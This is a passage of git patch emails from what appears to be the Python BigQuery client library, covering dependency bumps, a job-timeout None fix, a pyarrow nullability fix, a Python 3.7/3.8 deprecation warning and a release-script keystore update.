From fabb2baebdc8a046c4fa00f9e1a65495430b927d Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 16 Aug 2024 21:24:33 +0200 Subject: [PATCH 001/202] chore(deps): update all dependencies (#1993) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * pin PyYAML===6.0.1 for python 3.7 * fix the version pinning --------- Co-authored-by: Owl Bot Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 13 +++++++------ samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 4 ++-- 3 files changed, 10 insertions(+), 9 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 1a1cf4b04..f388c8248 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,25 +1,25 @@ -attrs==24.1.0 +attrs==24.2.0 certifi==2024.7.4 cffi===1.15.1; python_version == '3.7' -cffi==1.16.0; python_version >= '3.8' +cffi==1.17.0; python_version >= '3.8' charset-normalizer==3.3.2 click==8.1.7 click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' -db-dtypes==1.2.0 +db-dtypes==1.3.0 Fiona==1.9.6 geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' google-api-core==2.19.1 -google-auth==2.32.0 +google-auth==2.33.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 google-cloud-core==2.4.1 google-crc32c==1.5.0 -google-resumable-media==2.7.1 +google-resumable-media==2.7.2 googleapis-common-protos==1.63.2 grpcio===1.62.2; python_version == '3.7' grpcio==1.65.4; python_version >= '3.8' @@ -43,7 +43,8 @@ pycparser==2.22; python_version >= '3.8' pyparsing==3.1.2 python-dateutil==2.9.0.post0 pytz==2024.1 -PyYAML==6.0.1 +PyYAML===6.0.1; python_version == '3.7'
+PyYAML==6.0.2; python_version >= '3.8' requests==2.31.0; python_version == '3.7' requests==2.32.3; python_version >= '3.8' rsa==4.9 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index a1044c231..956b168dd 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,5 +1,5 @@ bigquery_magics==0.1.0 -db-dtypes==1.2.0 +db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 ipython===7.31.1; python_version == '3.7' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 81fa3782c..42b1243eb 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,5 +1,5 @@ bigquery-magics==0.1.0 -db-dtypes==1.2.0 +db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 ipython===7.31.1; python_version == '3.7' @@ -7,7 +7,7 @@ ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' matplotlib===3.5.3; python_version == '3.7' matplotlib===3.7.4; python_version == '3.8' -matplotlib==3.9.1; python_version >= '3.9' +matplotlib==3.9.2; python_version >= '3.9' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.2; python_version >= '3.9' From edcb79ca69dba30d8102abebb9d53bc76e4882ee Mon Sep 17 00:00:00 2001 From: Misha Behersky Date: Mon, 19 Aug 2024 21:15:10 +0300 Subject: [PATCH 002/202] fix: do not set job timeout extra property if None (#1987) Co-authored-by: Lingqing Gan --- google/cloud/bigquery/job/base.py | 7 +++++-- tests/unit/job/test_base.py | 18 ++++++++++++++++++ 2 files changed, 23 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index f165fd036..e5f68c843 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -218,8 +218,11 @@ def job_timeout_ms(self, value): err.__traceback__ ) - """ Docs indicate a string is expected by 
the API """ - self._properties["jobTimeoutMs"] = str(value) + if value is not None: + # docs indicate a string is expected by the API + self._properties["jobTimeoutMs"] = str(value) + else: + self._properties.pop("jobTimeoutMs", None) @property def labels(self): diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index a7337afd2..2d2f0c13c 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -1320,3 +1320,21 @@ def test_job_timeout_ms(self): # Confirm that integers get converted to strings. job_config.job_timeout_ms = 5000 assert job_config.job_timeout_ms == "5000" # int is converted to string + + def test_job_timeout_is_none_when_set_none(self): + job_config = self._make_one() + job_config.job_timeout_ms = None + # Confirm value is None and not literal string 'None' + assert job_config.job_timeout_ms is None + + def test_job_timeout_properties(self): + # Make sure any value stored in properties is erased + # when setting job_timeout to None. + job_config = self._make_one() + job_config.job_timeout_ms = 4200 + assert job_config.job_timeout_ms == "4200" + assert job_config._properties.get("jobTimeoutMs") == "4200" + + job_config.job_timeout_ms = None + assert job_config.job_timeout_ms is None + assert "jobTimeoutMs" not in job_config._properties From 5352870283ca7d4652aefc73f12645bcf6e1363c Mon Sep 17 00:00:00 2001 From: Yilin Xu Date: Tue, 20 Aug 2024 06:21:01 -0700 Subject: [PATCH 003/202] fix: set pyarrow field nullable to False for a BigQuery field in REPEATED mode (#1999) Co-authored-by: Lingqing Gan --- google/cloud/bigquery/_pandas_helpers.py | 2 +- tests/unit/test__pandas_helpers.py | 17 +++++++++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index c21a02569..210ab4875 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -200,7 +200,7 @@ def 
bq_to_arrow_field(bq_field, array_type=None): # local NULL values. Arrow will gladly interpret these NULL values # as non-NULL and give you an arbitrary value. See: # https://github.com/googleapis/python-bigquery/issues/1692 - nullable=True, + nullable=False if bq_field.mode.upper() == "REPEATED" else True, metadata=metadata, ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 58d2b73b3..203cc1d1c 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -2002,6 +2002,23 @@ def test_bq_to_arrow_field_type_override(module_under_test): ) +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +def test_bq_to_arrow_field_set_repeated_nullable_false(module_under_test): + assert ( + module_under_test.bq_to_arrow_field( + schema.SchemaField("name", "STRING", mode="REPEATED") + ).nullable + is False + ) + + assert ( + module_under_test.bq_to_arrow_field( + schema.SchemaField("name", "STRING", mode="NULLABLE") + ).nullable + is True + ) + + @pytest.mark.parametrize( "field_type, metadata", [ From 1bfc761e15fae000f2a983e90dfc838ca9af4c3e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 27 Aug 2024 20:17:04 +0200 Subject: [PATCH 004/202] chore(deps): update all dependencies (#2002) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 8 ++++---- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index f388c8248..892c1524e 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -14,7 +14,7 @@
geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' google-api-core==2.19.1 -google-auth==2.33.0 +google-auth==2.34.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 google-cloud-core==2.4.1 @@ -22,8 +22,8 @@ google-crc32c==1.5.0 google-resumable-media==2.7.2 googleapis-common-protos==1.63.2 grpcio===1.62.2; python_version == '3.7' -grpcio==1.65.4; python_version >= '3.8' -idna==3.7 +grpcio==1.66.0; python_version >= '3.8' +idna==3.8 munch==4.0.0 mypy-extensions==1.0.0 packaging===24.0; python_version == '3.7' @@ -48,7 +48,7 @@ PyYAML==6.0.2; python_version >= '3.8' requests==2.31.0; python_version == '3.7' requests==2.32.3; python_version >= '3.8' rsa==4.9 -Shapely==2.0.5 +Shapely==2.0.6 six==1.16.0 typing-extensions===4.7.1; python_version == '3.7' typing-extensions==4.12.2; python_version >= '3.8' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 956b168dd..b08ecad7e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.1.0 +bigquery_magics==0.1.1 db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 42b1243eb..0467676fc 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.1.0 +bigquery-magics==0.1.1 db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 From ea69fe315592f3a73417f175b1fe4543203cb716 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 28 Aug 2024 01:08:51 +0200 Subject: [PATCH 005/202] chore(deps): update all dependencies (#2004) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See
https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 892c1524e..25dd4b319 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -20,7 +20,7 @@ google-cloud-bigquery-storage==2.25.0 google-cloud-core==2.4.1 google-crc32c==1.5.0 google-resumable-media==2.7.2 -googleapis-common-protos==1.63.2 +googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' grpcio==1.66.0; python_version >= '3.8' idna==3.8 @@ -40,7 +40,7 @@ pyasn1-modules===0.3.0; python_version == '3.7' pyasn1-modules==0.4.0; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' -pyparsing==3.1.2 +pyparsing==3.1.4 python-dateutil==2.9.0.post0 pytz==2024.1 PyYAML===6.0.1; python_version == '3.7' From 7af65236c928b105299f158084029cf45438e56e Mon Sep 17 00:00:00 2001 From: shollyman Date: Wed, 4 Sep 2024 12:09:39 -0700 Subject: [PATCH 006/202] testing: remove testing identity override (#2011) * testing: remove testing identity override This PR removes a stale reference to a membership group in samples tests. --- samples/snippets/view.py | 2 +- samples/snippets/view_test.py | 3 +-- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/samples/snippets/view.py b/samples/snippets/view.py index 94f406890..30e719c79 100644 --- a/samples/snippets/view.py +++ b/samples/snippets/view.py @@ -147,7 +147,7 @@ def grant_access( # Make an API request to get the view dataset ACLs. 
view_dataset = client.get_dataset(view_dataset_id) - analyst_group_email = "data_analysts@example.com" + analyst_group_email = "example-analyst-group@google.com" # [END bigquery_grant_view_access] # To facilitate testing, we replace values with alternatives # provided by the testing harness. diff --git a/samples/snippets/view_test.py b/samples/snippets/view_test.py index dfa1cdeee..d46595695 100644 --- a/samples/snippets/view_test.py +++ b/samples/snippets/view_test.py @@ -114,7 +114,6 @@ def test_view( project_id, dataset_id, table_id = view_id.split(".") overrides: view.OverridesDict = { - "analyst_group_email": "cloud-dpes-bigquery@google.com", "view_dataset_id": view_dataset_id, "source_dataset_id": source_dataset_id, "view_reference": { @@ -127,5 +126,5 @@ def test_view( assert len(view_dataset.access_entries) != 0 assert len(source_dataset.access_entries) != 0 out, _ = capsys.readouterr() - assert "cloud-dpes-bigquery@google.com" in out + assert "example-analyst-group@google.com" in out assert table_id in out From 3ab5e95984ad521027a4e1efd9f16767403e668d Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 5 Sep 2024 11:28:49 -0700 Subject: [PATCH 007/202] feat: include LegacyPandasError in init imports (#2014) --- google/cloud/bigquery/__init__.py | 1 + 1 file changed, 1 insertion(+) diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index e80907ec9..26d03286f 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -44,6 +44,7 @@ from google.cloud.bigquery.enums import SqlTypeNames from google.cloud.bigquery.enums import StandardSqlTypeNames from google.cloud.bigquery.exceptions import LegacyBigQueryStorageError +from google.cloud.bigquery.exceptions import LegacyPandasError from google.cloud.bigquery.exceptions import LegacyPyarrowError from google.cloud.bigquery.external_config import ExternalConfig from google.cloud.bigquery.external_config import BigtableOptions From 
f0a41618f10e754863617e9efa32707814ca895d Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 10 Sep 2024 21:13:15 +0200 Subject: [PATCH 008/202] chore(deps): update all dependencies (#2005) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * add version constraint for google-crc32c --------- Co-authored-by: Owl Bot Co-authored-by: Leah Cole --- samples/geography/requirements.txt | 13 +++++++------ samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 4 ++-- 3 files changed, 11 insertions(+), 10 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 25dd4b319..cfb27cca9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,7 +1,7 @@ attrs==24.2.0 -certifi==2024.7.4 +certifi==2024.8.30 cffi===1.15.1; python_version == '3.7' -cffi==1.17.0; python_version >= '3.8' +cffi==1.17.1; python_version >= '3.8' charset-normalizer==3.3.2 click==8.1.7 click-plugins==1.1.1 @@ -13,16 +13,17 @@ geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.19.1 +google-api-core==2.19.2 google-auth==2.34.0 google-cloud-bigquery==3.25.0 -google-cloud-bigquery-storage==2.25.0 +google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 -google-crc32c==1.5.0 +google-crc32c==1.5.0; python_version < '3.9' +google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.66.0; python_version >= '3.8' +grpcio==1.66.1; python_version >= '3.8' idna==3.8 munch==4.0.0 mypy-extensions==1.0.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt
index b08ecad7e..f18db407e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,7 +1,7 @@ -bigquery_magics==0.1.1 +bigquery_magics==0.2.0 db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 -google-cloud-bigquery-storage==2.25.0 +google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 0467676fc..0b906c4ea 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ -bigquery-magics==0.1.1 +bigquery-magics==0.2.0 db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 -google-cloud-bigquery-storage==2.25.0 +google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' From 325519afc80133aabe81ca069f2b891ef990acb6 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 11 Sep 2024 18:11:59 +0200 Subject: [PATCH 009/202] chore(deps): update all dependencies (#2017) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update samples/geography/requirements.txt --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 68f9039cc..1640e1a95 100644 --- a/samples/desktopapp/requirements-test.txt +++
b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 335236a14..1ccebd9cd 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 68f9039cc..1640e1a95 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 68f9039cc..1640e1a95 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 083b20271..bb0b2a6bf 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 From 1b4cca0a3cc788a4570705572d5f04172f6b4b24 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Wed, 11 Sep 2024 11:35:42 -0700 Subject: [PATCH 010/202] docs: improve 
QueryJobConfig.destination docstring (#2016) * docs: improve QueryJobConfig.destination docstring * add space --- google/cloud/bigquery/job/query.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 4ea5687e0..ca2448eaa 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -476,6 +476,11 @@ def destination(self): ID, each separated by ``.``. For example: ``your-project.your_dataset.your_table``. + .. note:: + + Only table ID is passed to the backend, so any configuration + in `~google.cloud.bigquery.table.Table` is discarded. + See https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationQuery.FIELDS.destination_table """ From 847feb48c26e96fdcb1393458f370c79d4c92fed Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 11 Sep 2024 17:16:06 -0400 Subject: [PATCH 011/202] chore: adds Python 3.7/3.8 EOL pending deprecation warning (#2007) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * adds pending deprecation warning * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * revise code to put version function in version helpers * Update noxfile.py * Update google/cloud/bigquery/__init__.py --------- Co-authored-by: Owl Bot Co-authored-by: Lingqing Gan --- google/cloud/bigquery/__init__.py | 13 ++++++++++++ google/cloud/bigquery/_versions_helpers.py | 14 +++++++++++++ noxfile.py | 23 +++++++++++++++++++--- 3 files changed, 47 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index 26d03286f..caf75333a 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -115,12 +115,25 @@ from google.cloud.bigquery.table import TimePartitioningType from google.cloud.bigquery.table import TimePartitioning from
google.cloud.bigquery.encryption_configuration import EncryptionConfiguration +from google.cloud.bigquery import _versions_helpers try: import bigquery_magics # type: ignore except ImportError: bigquery_magics = None +sys_major, sys_minor, sys_micro = _versions_helpers.extract_runtime_version() + +if sys_major == 3 and sys_minor in (7, 8): + warnings.warn( + "The python-bigquery library will stop supporting Python 3.7 " + "and Python 3.8 in a future major release expected in Q4 2024. " + f"Your Python version is {sys_major}.{sys_minor}.{sys_micro}. We " + "recommend that you update soon to ensure ongoing support. For " + "more details, see: [Google Cloud Client Libraries Supported Python Versions policy](https://cloud.google.com/python/docs/supported-python-versions)", + PendingDeprecationWarning, + ) + __all__ = [ "__version__", "Client", diff --git a/google/cloud/bigquery/_versions_helpers.py b/google/cloud/bigquery/_versions_helpers.py index 72d4c921d..cfbf70a8e 100644 --- a/google/cloud/bigquery/_versions_helpers.py +++ b/google/cloud/bigquery/_versions_helpers.py @@ -14,6 +14,7 @@ """Shared helper functions for verifying versions of installed modules.""" +import sys from typing import Any import packaging.version @@ -248,3 +249,16 @@ def try_import(self, raise_if_error: bool = False) -> Any: and PYARROW_VERSIONS.try_import() is not None and PYARROW_VERSIONS.installed_version >= _MIN_PYARROW_VERSION_RANGE ) + + +def extract_runtime_version(): + # Retrieve the version information + version_info = sys.version_info + + # Extract the major, minor, and micro components + major = version_info.major + minor = version_info.minor + micro = version_info.micro + + # Display the version number in a clear format + return major, minor, micro diff --git a/noxfile.py b/noxfile.py index a2df2e094..2376309ff 100644 --- a/noxfile.py +++ b/noxfile.py @@ -116,6 +116,7 @@ def default(session, install_extras=True): session.run( "py.test", "--quiet", + "-W 
default::PendingDeprecationWarning", "--cov=google/cloud/bigquery", "--cov=tests/unit", "--cov-append", @@ -231,6 +232,7 @@ def system(session): session.run( "py.test", "--quiet", + "-W default::PendingDeprecationWarning", os.path.join("tests", "system"), *session.posargs, ) @@ -299,6 +301,7 @@ def snippets(session): session.run( "py.test", "samples", + "-W default::PendingDeprecationWarning", "--ignore=samples/desktopapp", "--ignore=samples/magics", "--ignore=samples/geography", @@ -401,9 +404,23 @@ def prerelease_deps(session): session.run("python", "-m", "pip", "freeze") # Run all tests, except a few samples tests which require extra dependencies. - session.run("py.test", "tests/unit") - session.run("py.test", "tests/system") - session.run("py.test", "samples/tests") + session.run( + "py.test", + "tests/unit", + "-W default::PendingDeprecationWarning", + ) + + session.run( + "py.test", + "tests/system", + "-W default::PendingDeprecationWarning", + ) + + session.run( + "py.test", + "samples/tests", + "-W default::PendingDeprecationWarning", + ) @nox.session(python=DEFAULT_PYTHON_VERSION) From 255472359f3ed6b6cee06039ebe9059607fd9894 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Sep 2024 16:44:54 +0200 Subject: [PATCH 012/202] chore(deps): update all dependencies (#2018) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update samples/geography/requirements.txt --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe Co-authored-by: Leah E.
Cole <6719667+leahecole@users.noreply.github.com> --- samples/geography/requirements.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index cfb27cca9..350419781 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -18,7 +18,7 @@ google-auth==2.34.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 -google-crc32c==1.5.0; python_version < '3.9' +google-crc32c===1.5.0; python_version < '3.9' google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 @@ -36,14 +36,14 @@ proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' pyasn1===0.5.1; python_version == '3.7' -pyasn1==0.6.0; python_version >= '3.8' +pyasn1==0.6.1; python_version >= '3.8' pyasn1-modules===0.3.0; python_version == '3.7' -pyasn1-modules==0.4.0; python_version >= '3.8' +pyasn1-modules==0.4.1; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' pyparsing==3.1.4 python-dateutil==2.9.0.post0 -pytz==2024.1 +pytz==2024.2 PyYAML===6.0.1; python_version == '3.7' PyYAML==6.0.2; python_version >= '3.8' requests==2.31.0; python_version == '3.7' From b561aaf6bb744300ca668b37e8cb047dc3d428be Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 17 Sep 2024 11:18:05 -0400 Subject: [PATCH 013/202] build(python): release script update (#2024) Source-Link: https://github.com/googleapis/synthtool/commit/71a72973dddbc66ea64073b53eda49f0d22e0942 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:e8dcfd7cbfd8beac3a3ff8d3f3185287ea0625d859168cc80faccfc9a7a00455 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 ++-- .kokoro/release.sh | 2 +- .kokoro/release/common.cfg | 2 +- 3 files changed, 4 
insertions(+), 4 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 6d064ddb9..597e0c326 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:94bb690db96e6242b2567a4860a94d48fa48696d092e51b0884a1a2c0a79a407 -# created: 2024-07-31T14:52:44.926548819Z + digest: sha256:e8dcfd7cbfd8beac3a3ff8d3f3185287ea0625d859168cc80faccfc9a7a00455 +# created: 2024-09-16T21:04:09.091105552Z diff --git a/.kokoro/release.sh b/.kokoro/release.sh index 81cee716e..453d6f702 100755 --- a/.kokoro/release.sh +++ b/.kokoro/release.sh @@ -23,7 +23,7 @@ python3 -m releasetool publish-reporter-script > /tmp/publisher-script; source / export PYTHONUNBUFFERED=1 # Move into the package, build the distribution and upload. -TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-1") +TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-2") cd github/python-bigquery python3 setup.py sdist bdist_wheel twine upload --username __token__ --password "${TWINE_PASSWORD}" dist/* diff --git a/.kokoro/release/common.cfg b/.kokoro/release/common.cfg index cb8bbaa2e..43b5a1f27 100644 --- a/.kokoro/release/common.cfg +++ b/.kokoro/release/common.cfg @@ -28,7 +28,7 @@ before_action { fetch_keystore { keystore_resource { keystore_config_id: 73713 - keyname: "google-cloud-pypi-token-keystore-1" + keyname: "google-cloud-pypi-token-keystore-2" } } } From ef8e92787941ed23b9b2b5ce7c956bcb3754b995 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 20 Sep 2024 23:21:58 +0200 Subject: [PATCH 014/202] chore(deps): update all dependencies (#2025) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See
https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 350419781..aa2ccfc28 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' grpcio==1.66.1; python_version >= '3.8' -idna==3.8 +idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 packaging===24.0; python_version == '3.7' From ba99b12215995448998fccb6691423f4555a73bf Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 24 Sep 2024 19:46:21 +0200 Subject: [PATCH 015/202] chore(deps): update all dependencies (#2029) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) 